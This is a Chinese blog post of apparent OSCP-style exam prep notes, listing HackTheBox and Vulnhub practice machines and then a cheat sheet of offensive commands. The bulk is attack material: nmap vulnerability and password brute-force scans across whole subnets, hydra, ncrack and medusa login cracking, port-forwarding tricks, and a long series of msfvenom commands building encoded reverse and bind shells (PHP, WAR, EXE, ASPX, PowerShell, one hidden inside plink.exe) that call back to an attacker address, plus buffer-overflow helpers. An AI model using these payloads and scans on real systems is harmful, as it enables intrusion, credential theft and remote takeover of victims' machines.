Dragon
adminAdmin  2019-04-15 15:13 来源:lsh4ck's Blog 隐藏边栏 |   抢沙发  70 
文章评分 1 次,平均分 5.0

准备:

htb machine

  • Bastard 10.10.10.9
  • Cronos 10.10.10.13
  • Grandpa10.10.10.14
  • October 10.10.10.16
  • Calamity 10.10.10.27
  • Solidstate 10.10.10.51
  • Enterprise 10.10.10.61
  • Sense 10.10.10.60
  • Bart (Again, same issue but really get used to windows) 10.10.10.81
  • Frolic10.10.10.111

Vulnhub machinesWebsite

  • Kioptrix: Level 1 (#1)
  • Kioptrix: Level 1.1 (#2)
  • Kioptrix: Level 1.2 (#3)
  • Kioptrix: Level 1.3 (#4)
  • FristiLeaks: 1.3
  • Stapler: 1
  • PwnLab: init
  • Kioptrix: 2014
  • Brainpan: 1
  • Mr-Robot: 1
  • HackLAB: Vulnix
  • VulnOS: 2
  • SickOs: 1.2
  • /dev/random: scream
  • pWnOS: 2.0
  • SkyTower: 1
  • IMF

一些实用命令

Port knock:
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
普通 nmap:
nmap -sS -Pn --open x.x.x.x
nmap -sC -sS -A -O x.x.x.x
nmap 自己的王牌命令:
nmap -sS --osscan-guess -A -vv --script=vuln x.x.x.x
nmap -sF -A --version-all -sC --osscan-guess -F -n -sV
利用 nmap 一句话进行目标 C 段常规漏洞扫描:
nmap -sT -Pn -v --script dns-zone-transfer.nse,ftp-anon.nse,ftp-proftpd-backdoor.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,http-backup-finder.nse,http-cisco-anyconnect.nse,http-iis-short-name-brute.nse,http-put.nse,http-php-version.nse,http-shellshock.nse,http-robots.txt.nse,http-svn-enum.nse,http-webdav-scan.nse,iax2-version.nse,memcached-info.nse,mongodb-info.nse,msrpc-enum.nse,ms-sql-info.nse,mysql-info.nse,nrpe-enum.nse,pptp-version.nse,redis-info.nse,rpcinfo.nse,samba-vuln-cve-2012-1182.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse,snmp-info.nse,sshv1.nse,xmpp-info.nse,tftp-enum.nse,teamspeak2-version.nse x.x.x.0/24
利用 nmap 一句话进行目标 C 段弱口令爆破:
nmap -sT -v -Pn --script ftp-brute.nse,imap-brute.nse,smtp-brute.nse,pop3-brute.nse,mongodb-brute.nse,redis-brute.nse,ms-sql-brute.nse,rlogin-brute.nse,rsync-brute.nse,mysql-brute.nse,pgsql-brute.nse,oracle-sid-brute.nse,oracle-brute.nse,rtsp-url-brute.nse,snmp-brute.nse,svn-brute.nse,telnet-brute.nse,vnc-brute.nse,xmpp-brute.nse x.x.x.0/24
nmap 扫 smb:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse x.x.x.x
smb 可利用的用户名和共享扫描:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse x.x.x.x
nmap 扫 ldap 匿名认证:
nmap -p389 --script ldap-search
gobuster 综合扫描:
gobuster -s 200,204,301,302,307,403 -u http://x.x.x.x -w /usr/share/wordlists/xxxx.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
gobuster 通常扫描:
gobuster -u http://x.x.x.x -w /usr/share/wordlists/xxxx.txt -t 50 -x php,txt,zip,tar
rpcclient 空连接:
rpcclient -U "" x.x.x.x
smb 连接:
smbclient //MOUNT/share
rdesktop:
rdesktop -u username -p password -g 85% -r disk:share=/root/ x.x.x.x
python ftp-server:

linux 结果答案截图:
hostname && whoami && cat proof.txt && /sbin/ifconfig
windows 结果答案截图:
hostname && whoami.exe && type proof.txt && ipconfig /all
sshuttle:github
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
本地端口转发:
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
远程端口转发:
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
动态端口转发:
ssh -D <local proxy port> -p <remote port> <target>
plink 端口转发:
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

John 爆破相关:

RDP 爆破:
ncrack -vv --user offsec -P passwords rdp://x.x.x.x
SSH 爆破:
hydra -l user -P pass.txt -t x.x.x.x ssh -s 22
FTP 爆破:
medusa -h x.x.x.x -u user -P passwords.txt -M ftp

MSF 生成 PAYLOAD:

PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php`

Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

BOF(Buffer Overflow)的一些命令:

payload = "\x41" * + + "\x90" * 16 + + "\x43" *

Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l

Pattern offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l -q xxxxxxx

nasm
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax

Bad characters
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

考试

报告

建议报告结构:

  

本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:1 最后编辑于:2019-04-16
这个人很懒,什么都没写

发表评论

表情 贴图 链接 私密 格式 签到

切换注册

登录

忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享